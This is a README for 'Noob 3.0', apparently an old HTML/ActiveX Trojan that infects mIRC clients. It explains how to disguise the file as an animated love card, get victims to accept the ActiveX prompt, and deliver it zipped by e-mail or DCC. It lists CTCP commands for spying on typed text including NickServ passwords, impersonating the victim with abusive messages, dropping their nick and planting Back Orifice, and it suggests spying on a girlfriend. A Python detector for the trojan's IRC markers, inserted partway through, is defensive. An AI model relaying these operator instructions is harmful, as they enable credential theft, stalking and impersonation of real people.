What is it?
What's so special about it?
- The ability to bypass any type of firewall
(e.g. AtGuard, Conceal and Proxy servers & Wingates). I think that
firewalls are the greatest barriers to Trojans. With Noob this problem
is solved! :-)
- The file isn't an executable. It's an HTML based Trojan.
- If you can figure out my spaghetti code, then you can customize the
Trojan because I wrote everything in scripting language so that it
doesn't have to be an *.Exe (Nobody seems to accept Exe files these
days). I'm not selfish but please don't forget to give me credits for
any modifications you make on Noob.
- You can spy on your target's conversation in real time and send
messages to people from his nickname without him/her seeing what
you sent.
- Limited ability to write/read from files using commands such as
'/write' in mIRC.
- It looks like anything except a Trojan. Noob is ideal to send to
your girlfriend, if you think she's not being totally loyal :P,
because it's in the form of a byoootiful lil love animated card. Ain't
that sweet?
What are the main drawbacks? (I do not claim that Noob
is perfect)
- The victim must be using Microsoft Internet Explorer 4.0 SP1
or 5.0
- The user must click on 'yes' when prompted if he/she wishes to allow
ActiveX objects to be accessed by scripts. (but since browsers often
display silly dialogs some people just click on 'yes' without even
reading it. And besides I make it seem that the card uses ActiveX so
that they think it is necessary to enable it)
- By default ActiveX controls are disabled when browsing over Internet
Zones therefore this Trojan cannot be used on a Website. Don't even
think of sending it through HTML-based E-mails like hotmail as an
attachment, unless you zip it first, because when
the target opens the mail it will still be over an internet zone
therefore it won't work.
How should I send it?
- Since Noob was designed for IRC users you could send it through DCC.
- Zip the file first and then send it via E-mail. This forces them to
download it before viewing.
- The above solutions are only proposed scenarios. You can send the
file any way you wish but just remember that it must be viewed off the
web.
Full Details
The main reason why I made this version of Noob is because it is not affected by the use of Firewalls. Even if the victim uses a firewall to filter incoming and outgoing traffic through his ports, Noob 3.0 will not be affected as it sends and receives through an IRC connection. In addition to this there is no need to use telnet or netcat in this version. All commands can be issued directly from your own mIRC window (see point 6).
With this mail comes an attachment file called "AnimatedCard.htm". This is the Trojan itself. The particularity of this Trojan is that there is no need for the victim to run an executable (*.exe file) because many people have grown suspicious about them. Instead of that the victim just has to open an HTML file and click "YES" at a not-at-all scary warning dialog.
Here is a scenario:
1. Send it as a mail attachment after having zipped it.
2. Once the victim opens that page he/she will be prompted to Accept Initialization of an ActiveX Control (this is the sticky part). If the victim clicks on "YES" then he/she will be infected.
* Note once again that this only works on Internet Explorer 4.0 SP1 or 5.0 actually*
3. Assuming that the Victim clicks on "YES", the Trojan will scan his Hard Disk and search for any mIRC scripts or plain mIRC presence. Once it finds a version of mIRC it infects it with a "script.ini" like Trojan called Noobini.ini.
4. When your victim connects to IRC all you have to do is type:
/ctcp {your victim's nickname} gravity3
If the victim was successfully infected then you will receive a message from him saying "Noob Active".
5. Now all you have to do is sit and wait to see whatever the victim is typing in his mIRC including his Nickserv or Chanserv PASSWORDS (on Dalnet) !!! Everything will be sent to you in the query window.
6. You can also issue commands to the mIRC of the victim by simply typing commands in your mIRC window as shown below...
for example you could type:
(a). To see the victim's nick changed to "I-Am-A-Bitch" type:
/ctcp {your victim's nickname} /nick I-Am-A-Bitch
(b). To drop the victim's nickname if he has identified type:
/ctcp {your victim's nickname} /nickserv drop {The victim's current nick}
(c). To make the person banned from a channel try this ;)
/ctcp {your victim's nickname} /msg {#channel name} I think you're all too lame. Fuck you all!
(d). To get an Fserve Running try using the FSERV command... more on that in the mIRC help file. This command can turn out to be useful if you want to download or upload file to the victim such as a
Back Orifice server in the "Startup" folder.
The possibilities to this are only limited to mIRC commands that exist.
It's as if you were in the place of the user.
(e). If you want to say something to a user from the victim's behalf
try this out.
-Let us imagine that your target is called John and he is talking to
someone called Ann and that you want Ann to think that John is really a
piece of shit. Do the following...-
/ctcp John //raw PRIVMSG Ann :Whenever I see you I feel so
horny. I just can't figure out why! How much would you take for a night
bitch?
-Now you can imagine what's going on in Ann's mind but poor John will
probably never understand why Ann thinks he is such a jerk since John
never saw what message you sent Ann from his nickname. :P
7. To stop spying on the victim just type:
/ctcp {your victim's nickname} gone
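Seen from the defending side, the scenario above leaves three markers in raw IRC traffic or a server-side log: the "gravity3" and "gone" CTCP triggers, the "Noob Active" reply, and CTCP requests whose body is itself a client command. The detector below is an added example, not part of the original README or of Noob's code; it assumes RFC 1459 line framing, the sample lines are constructed, and matching "Noob Active" in either PRIVMSG or NOTICE is an assumption because the text does not say which one carries the reply.

```python
import re

# Raw IRC line: ":nick!user@host PRIVMSG|NOTICE target :text" (RFC 1459 framing).
LINE = re.compile(
    r"^:(?P<src>[^!\s]+)\S*\s+(?P<cmd>PRIVMSG|NOTICE)\s+(?P<dst>\S+)\s+:(?P<text>.*)$"
)

# CTCP payloads named in the README as the on/off switches.
TRIGGERS = {"gravity3": "activation trigger", "gone": "deactivation trigger"}


def classify(line):
    """Return (rule, src, dst) for a line matching a Noob marker, else None."""
    m = LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    src, cmd, dst, text = m.group("src", "cmd", "dst", "text")
    if "Noob Active" in text:
        return ("infected client confirmed", src, dst)
    # CTCP requests are PRIVMSGs whose text is wrapped in \x01 bytes.
    if cmd == "PRIVMSG" and text.startswith("\x01"):
        payload = text.strip("\x01").strip()
        if payload in TRIGGERS:
            return (TRIGGERS[payload], src, dst)
        if payload.startswith("/"):
            # A CTCP body that is itself a client command: the relay in step 6.
            return ("command relayed over CTCP", src, dst)
    return None


def scan(lines):
    """Classify every line and return the hits in order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample capture; nicks and hosts are placeholders.
SAMPLE = [
    ":alice!a@host.example PRIVMSG #chat :hello everyone",
    ":mallory!m@host.example PRIVMSG bob :\x01gravity3\x01",
    ":bob!b@host.example NOTICE mallory :Noob Active",
    ":mallory!m@host.example PRIVMSG bob :\x01/nick somenick\x01",
    ":carol!c@host.example PRIVMSG bob :\x01VERSION\x01",
    ":mallory!m@host.example PRIVMSG bob :\x01gone\x01",
]

if __name__ == "__main__":
    for rule, src, dst in scan(SAMPLE):
        print(f"{rule}: {src} -> {dst}")
```

On an endpoint, the matching file-system marker is a file named Noobini.ini inside the mIRC directory.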
-------------------------------------------------------------------------------------------------
I explained this in detail in this document but in fact it's much easier than it sounds:
1. Send the victim the file
2. Let him/her open it.
3. Connect to their PC and have fun!!
Personal Notes:
- Thanks to KanKan for starting such a wonderful project called the
Trojans Lair (www.tlsecurity.net).
- If you find something that can help enhance Noob please let me know.
I'd really welcome stuff like overflows that could disable the message
or any other miracle of that kind.
- Noob really screwed my life up. I lost my best friend coz of that...
Be careful with it. Spying isn't worth it if the person trusts you.
- I've recently worked on overflows for the most common browsers
and I plan to release a version soon. The new version will upload and
install a Noob server + a the thing trojan that works on IE 5.0, 5.01,
5.02, 4.01 and possibly another version for use with netscape
browsers. This new version will completely eliminate the user
prompting and will be operational even on 'Internet Zones' i.e. on
websites over the web. Coming soon!
- Sorry for the *1 message that some were receiving in the previous
version of Noob. That was due to a scripting error from me. (I'm such
an idiot sometimes.) This version works just fine on all mIRC
versions. I got hundreds of mails complaining about this. Sorry I
didn't reply to all of them! :P